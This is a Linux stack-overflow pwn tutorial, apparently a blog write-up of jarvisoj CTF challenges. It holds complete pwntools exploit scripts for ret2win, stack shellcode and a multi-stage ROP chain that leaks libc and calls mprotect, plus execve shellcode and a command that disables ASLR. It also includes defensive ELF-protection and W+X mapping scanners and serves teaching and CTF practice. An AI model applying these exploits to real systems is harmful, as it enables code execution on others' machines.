[28314] 2020-05-24 A brief talk on the art of pwn (1): Linux stack overflow
Tags: pwn, linux. Date: 2020-05-24. Topic: Linux pwn, using the jarvisoj challenges (https://www.jarvisoj.com/challenges).

0. Level0 (NX enabled, 64-bit Linux)

Linux binary protections, as they apply to pwn:

0. RELRO. Partial RELRO (ld -z relro): .got is made read-only, but .got.plt stays writable for lazy binding. Full RELRO (ld -z relro -z now): every import is resolved at load time, so both .got and .got.plt are read-only.
1. Stack canary: a random value placed before the saved frame pointer; its lowest byte is \x00.
2. NX: the stack (and other data pages) are not executable.
3. PIE: the ELF itself is loaded at a random base, so together with ASLR its addresses are not fixed.

Linux ASLR is controlled by randomize_va_space and can be disabled for debugging with: sudo bash -c "echo 0 > /proc/sys/kernel/randomize_va_space". 0 = ASLR off; 1 = mmap() regions, the stack and the VDSO are randomized; 2 = as 1, plus the brk() heap.

Open level0 in IDA.
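The protections listed above (RELRO, stack canary, NX, PIE) are all recorded in the ELF file itself, which is what checksec-style tools read. As an added, defender-side example that is not part of the original writeup, the following Python parses the ELF program headers and the PT_DYNAMIC segment to report them: PT_GNU_STACK without PF_X means NX, PT_GNU_RELRO means partial RELRO, and a BIND_NOW flag on top of that means full RELRO; ET_DYN is used as the PIE indicator and the presence of the __stack_chk_fail symbol name as a canary heuristic. build_sample_elf constructs a minimal, non-runnable ELF64 image purely as test input; it is not any of the challenge binaries.

```python
import struct
import sys

# ELF constants as defined in elf.h
ET_EXEC, ET_DYN = 2, 3
PT_DYNAMIC, PT_GNU_STACK, PT_GNU_RELRO = 2, 0x6474e551, 0x6474e552
PF_X = 1
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6ffffffb
DF_BIND_NOW, DF_1_NOW = 8, 1


def _header(data):
    """Read class, byte order, e_type and the program header table location."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    is64 = data[4] == 2                      # EI_CLASS: 1 = ELF32, 2 = ELF64
    endian = "<" if data[5] == 1 else ">"    # EI_DATA: 1 = little, 2 = big
    e_type, = struct.unpack_from(endian + "H", data, 16)
    if is64:
        phoff, = struct.unpack_from(endian + "Q", data, 32)
        phentsize, phnum = struct.unpack_from(endian + "HH", data, 54)
    else:
        phoff, = struct.unpack_from(endian + "I", data, 28)
        phentsize, phnum = struct.unpack_from(endian + "HH", data, 42)
    return endian, is64, e_type, phoff, phentsize, phnum


def _program_headers(data, endian, is64, phoff, phentsize, phnum):
    """Yield (p_type, p_flags, p_offset, p_filesz); field order differs between ELF32 and ELF64."""
    for i in range(phnum):
        off = phoff + i * phentsize
        if is64:
            p_type, p_flags, p_offset, _, _, p_filesz = struct.unpack_from(endian + "IIQQQQ", data, off)
        else:
            p_type, p_offset, _, _, p_filesz, _, p_flags = struct.unpack_from(endian + "IIIIIII", data, off)
        yield p_type, p_flags, p_offset, p_filesz


def _dynamic_entries(data, endian, is64, offset, size):
    """Yield (d_tag, d_val) pairs from the PT_DYNAMIC segment until DT_NULL."""
    fmt, step = (endian + "qQ", 16) if is64 else (endian + "iI", 8)
    for off in range(offset, offset + size, step):
        tag, val = struct.unpack_from(fmt, data, off)
        if tag == DT_NULL:
            break
        yield tag, val


def check_protections(data):
    """Report NX, RELRO level, PIE and (heuristically) stack canary for an ELF image."""
    endian, is64, e_type, phoff, phentsize, phnum = _header(data)
    result = {
        "nx": False,                             # no PT_GNU_STACK at all means an executable stack
        "relro": "none",
        "pie": e_type == ET_DYN,                 # ET_DYN executables get a random base under ASLR
        "canary": b"__stack_chk_fail" in data,   # heuristic: the canary check imports this symbol
    }
    dynamic = None
    for p_type, p_flags, p_offset, p_filesz in _program_headers(data, endian, is64, phoff, phentsize, phnum):
        if p_type == PT_GNU_STACK:
            result["nx"] = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            result["relro"] = "partial"          # GOT made read-only after relocation (ld -z relro)
        elif p_type == PT_DYNAMIC:
            dynamic = (p_offset, p_filesz)
    if result["relro"] == "partial" and dynamic:
        for tag, val in _dynamic_entries(data, endian, is64, *dynamic):
            # BIND_NOW resolves every import at load time, so .got.plt can be read-only too (-z now)
            if tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW) or (tag == DT_FLAGS_1 and val & DF_1_NOW):
                result["relro"] = "full"
                break
    return result


def build_sample_elf(nx=True, relro="full", pie=True, canary=True):
    """Construct a minimal, non-runnable ELF64 image with the requested flags (constructed test data)."""
    tags = ([(DT_FLAGS_1, DF_1_NOW)] if relro == "full" else []) + [(DT_NULL, 0)]
    dynamic = b"".join(struct.pack("<qQ", t, v) for t, v in tags)
    phdrs = [(PT_GNU_STACK, 6 if nx else 7)]            # RW- stack vs RWX stack
    if relro != "none":
        phdrs.append((PT_GNU_RELRO, 4))
    phdrs.append((PT_DYNAMIC, 6))
    phoff, phentsize = 64, 56
    dyn_off = phoff + phentsize * len(phdrs)
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8
    ehdr = ident + struct.pack("<HHIQQQIHHHHHH", ET_DYN if pie else ET_EXEC, 0x3e, 1, 0,
                               phoff, 0, 0, 64, phentsize, len(phdrs), 0, 0, 0)
    body = b""
    for p_type, p_flags in phdrs:
        off, size = (dyn_off, len(dynamic)) if p_type == PT_DYNAMIC else (0, 0)
        body += struct.pack("<IIQQQQQQ", p_type, p_flags, off, 0, 0, size, size, 8)
    return ehdr + body + dynamic + (b"__stack_chk_fail\x00" if canary else b"")


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            print(check_protections(f.read()))
    else:
        print(check_protections(build_sample_elf()))
```

Run it with a path to any ELF to get the same four facts the writeup lists for each level; the canary field is a string-search heuristic and can be fooled by a stripped or statically linked binary, so treat it as a hint rather than proof.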
In IDA, press F5 to decompile. main calls write(1, "Hello, World\n", 0xd): on Linux fd 0, 1 and 2 are stdin, stdout and stderr, newly opened fds start at 3, and write's return value comes back in eax. main then calls vulnerable_function, which does read(0, buf, 0x200) into buf at rbp-0x80: fd=0 is stdin, and up to 0x200 bytes are read into a buffer that is only 0x80 bytes from the saved frame pointer.

Function prologue (the same sequence an inline hook has to preserve): push bp saves the caller's frame pointer; mov bp, sp makes bp the base of the new frame; sub sp, xx reserves xx bytes of locals.

1. call func: call pushes the return address (pc) and then jumps to func.
2. Function epilogue when func returns:
   1. leave = mov sp, bp; pop bp. mov sp, bp discards the locals, pop bp restores the caller's bp, and sp now points at the saved pc.
   2. retn = pop ip. The saved caller's pc at sp is popped into ip, so whatever sits in that slot becomes the next instruction. That slot is what the overflow overwrites.

level0 payload: padding + bp + pc, with padding of 0x80 bytes. NX (no execute) means pc cannot point at shellcode on the stack, so pc is set to callsystem, a function in the binary that calls system("/bin/sh"); callsystem is at 0x400596.
level0 exploit script:

from pwn import *
context.log_level='DEBUG'
rmt=1
if rmt:
    r=remote('pwn2.jarvisoj.com',9881)
else:
    r=process('./level0')
sys_addr=0x400596
payload='a'*0x80+'b'*8+p64(sys_addr)
r.sendlineafter('Hello, World',payload)
r.interactive()

1. level1 (no NX, shellcode)

level1 is 32-bit and has no NX. Unlike level0, where pc was pointed at system("/bin/sh"), here shellcode is placed in buf and pc is pointed at buf, since the program prints buf's address. payload = shellcode + padding + bp + ret, where shellcode + padding is 0x88 bytes (32-bit layout), bp is 4 bytes and ret is the address of buf, so execution lands on the shellcode. The shellcode is generated with pwntools shellcraft and does the same as system("/bin/sh") through the Linux syscall table (https://syscalls.kernelgrok.com/): syscall 0xb is sys_execve, with eax=0xb, ebx=path, ecx=argv, envp=0, i.e. sys_execve(path, argv, envp).
level1 exploit script:

from pwn import *
context.log_level='DEBUG'
rmt=1
if rmt:
    r=remote('pwn2.jarvisoj.com',9877)
else:
    r=process('./level1')
r.recvuntil('this:')
buf_addr=int(r.recvuntil('?',drop=True),16)
payload = asm(shellcraft.sh()).ljust(0x88,'\x90')
payload+='b'*4 + p32(buf_addr)
r.send(payload)
r.interactive()

The pwntools shellcode (shellcraft.sh()) disassembles to:

/* execve(path='/bin///sh', argv=['sh'], envp=0) */
/* push '/bin///sh\x00' */
push 0x68
push 0x732f2f2f
push 0x6e69622f
mov ebx, esp
/* push argument array ['sh\x00'] */
/* push 'sh\x00\x00' */
push 0x1010101
xor dword ptr [esp], 0x1016972
xor ecx, ecx
push ecx /* null terminate */
push 4
pop ecx
add ecx, esp
push ecx /* 'sh\x00' */
mov ecx, esp
xor edx, edx
/* call execve() */
push SYS_execve /* 0xb */
pop eax
int 0x80
2. level5 (ROP; ASLR and NX enabled, no shellcode on the stack)

level2, level3 and level4 are ROP exercises; level5 reuses the level3 binary (level3_x64 below). ROP (Return-oriented Programming) chains gadgets, short instruction sequences in the binary or libc that end in ret, by stacking their addresses on the overflowed stack. Level5 asks for a solution with mmap or mprotect. The plan:

1. libc is under ASLR, and mmap/mprotect live in libc, so libc's base has to be leaked first.
2. There is no PIE, so the shellcode can be written to .bss at a fixed address.
3. NX means .bss is not executable, so mprotect .bss to make it executable.
4. Jump to the shellcode in .bss.

1) Leak libc. ASLR without PIE means the binary's own addresses are fixed while libc's are not, so call write(1, write@got) to print write's address inside libc.

Under the Linux x86-64 calling convention this means rdi=1, rsi=write@got, then call write@plt. The PLT (procedure linkage table) is the stub the binary calls; it jumps through the GOT (global offset table), where the dynamic linker stores the resolved libc address of each imported function. So the GOT entry holds the value to leak and the PLT entry is a fixed address to call. The rdi is set with a ROP gadget (pop rdi; ret at 0x4006b3). The leaked write@got value minus write's offset in libc gives libc's base.

2) Write the shellcode to .bss with read(0, bss_addr, sizeof(shellcode)), again through ROP, so the shellcode ends up in .bss.

3) Make .bss executable with mprotect(bss_addr, 0x1000, 7).
mprotect's prot argument 7 is the OR of: 1. PROT_READ, 2. PROT_WRITE, 3. PROT_EXEC (4. PROT_NONE means no access at all).

4) Return to the shellcode in .bss.

Exploit script (run against the level3_x64 binary with libc-2.19.so):

from pwn import *
context.log_level='DEBUG'
local=1
if local:
    r=process('./level3_x64')
else:
    r=remote('pwn2.jarvisoj.com',9883)
file=ELF('./level3_x64')
libc=ELF('./libc-2.19.so')

def debug():
    if local:
        print 'pid: '+str(r.pid)
        pause()

prdi=0x4006b3
prsi=0x4006b1
bss_start=0x600A88
start_addr=0x4004F0
'''
0x00000000004006b1 : pop rsi ; pop r15 ; ret
0x0000000000001b8e : pop rdx ; ret
'''
# stage 1: write(1, write@got, ...) to leak libc, then return to _start for another round
payload1='a'*0x80+'b'*8+p64(prdi)+p64(1)+p64(prsi)+p64(file.got['write'])+'c'*8+p64(file.plt['write'])
payload1+=p64(start_addr)
r.recvuntil('\n')
r.send(payload1)
write_got=u64(r.recv(8))
sleep(1)
libc_base=write_got-libc.sym['write']
mprotect=libc_base+libc.sym['mprotect']
prdx=libc_base+0x1b8e
print hex(libc_base)
print hex(mprotect)
print hex(prdx)
# stage 2: mprotect(0x600000, 0x1000, 7) makes the page holding .bss rwx
payload2='a'*0x80+'b'*8+p64(prdi)+p64(0x600000)+p64(prsi)+p64(0x1000)+'c'*8+p64(prdx)+p64(7)+p64(mprotect)+p64(start_addr)
r.recvuntil('\n')
r.send(payload2)
sleep(1)
debug()
# stage 3: read(0, bss_start, 48) to place the shellcode in .bss
payload3='a'*0x80+'b'*8+p64(prdi)+p64(0)+p64(prsi)+p64(bss_start)+'c'*8+p64(prdx)+p64(48)+p64(file.plt['read'])+p64(start_addr)
r.recvuntil('\n')
r.send(payload3)
sleep(1)
r.send(asm(shellcraft.amd64.linux.sh(),arch='amd64'))
debug()
# stage 4: return into the shellcode in .bss
payload4='a'*0x80+'b'*8+p64(bss_start)
r.recvuntil('\n')
r.send(payload4)
r.interactive()

Pwned.
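The final stage above only works because mprotect(..., 7) leaves a page that is readable, writable and executable at once, which is exactly the runtime artifact a monitor can look for: a normally built program under NX never has a W+X mapping. As an added, defender-side example that is not part of the original writeup, the following Python parses /proc/<pid>/maps text and reports every mapping that is both writable and executable, plus whether the stack is executable. The maps lines in SAMPLE_MAPS are constructed for this example (the rwxp region mirrors the 0x600000 page the script above makes executable); scan_process reads a live process's maps with the same parser.

```python
import re

# One /proc/<pid>/maps line: range, perms, file offset, device, inode, optional path.
_MAPS_LINE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+(?P<perms>[rwxsp-]{4})\s+"
    r"(?P<offset>[0-9a-f]+)\s+(?P<dev>\S+)\s+(?P<inode>\d+)\s*(?P<path>.*)$"
)


def parse_maps(text):
    """Parse /proc/<pid>/maps text into dicts with integer addresses; unparseable lines are skipped."""
    regions = []
    for line in text.splitlines():
        m = _MAPS_LINE.match(line.strip())
        if not m:
            continue
        regions.append({
            "start": int(m.group("start"), 16),
            "end": int(m.group("end"), 16),
            "perms": m.group("perms"),
            "path": m.group("path").strip(),
        })
    return regions


def find_wx_mappings(text):
    """Return (start, end, path) for every mapping that is writable and executable at the same time."""
    return [(r["start"], r["end"], r["path"]) for r in parse_maps(text)
            if "w" in r["perms"] and "x" in r["perms"]]


def stack_is_executable(text):
    """True if the [stack] mapping carries the x bit, i.e. NX is not in effect for the stack."""
    return any("x" in r["perms"] for r in parse_maps(text) if r["path"] == "[stack]")


def scan_process(pid):
    """Read a live process's maps (Linux only) and return its W+X mappings."""
    with open("/proc/%d/maps" % pid) as f:
        return find_wx_mappings(f.read())


# Constructed sample, not captured from a real process: the second line is the rwx page
# that mprotect(0x600000, 0x1000, 7) in the writeup would produce.
SAMPLE_MAPS = """\
00400000-00401000 r-xp 00000000 08:01 123456 /home/ctf/level3_x64
00600000-00601000 rwxp 00000000 08:01 123456 /home/ctf/level3_x64
7ffff7a0d000-7ffff7bcd000 r-xp 00000000 08:01 654321 /lib/x86_64-linux-gnu/libc-2.19.so
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack]
"""

if __name__ == "__main__":
    for start, end, path in find_wx_mappings(SAMPLE_MAPS):
        print("W+X mapping %#x-%#x %s" % (start, end, path))
    print("executable stack:", stack_is_executable(SAMPLE_MAPS))
```

A W+X region is not proof of compromise on its own (JIT compilers create them legitimately), but for a program that was built with NX and has no JIT it is a strong signal, and the region's path tells you which module's page was changed.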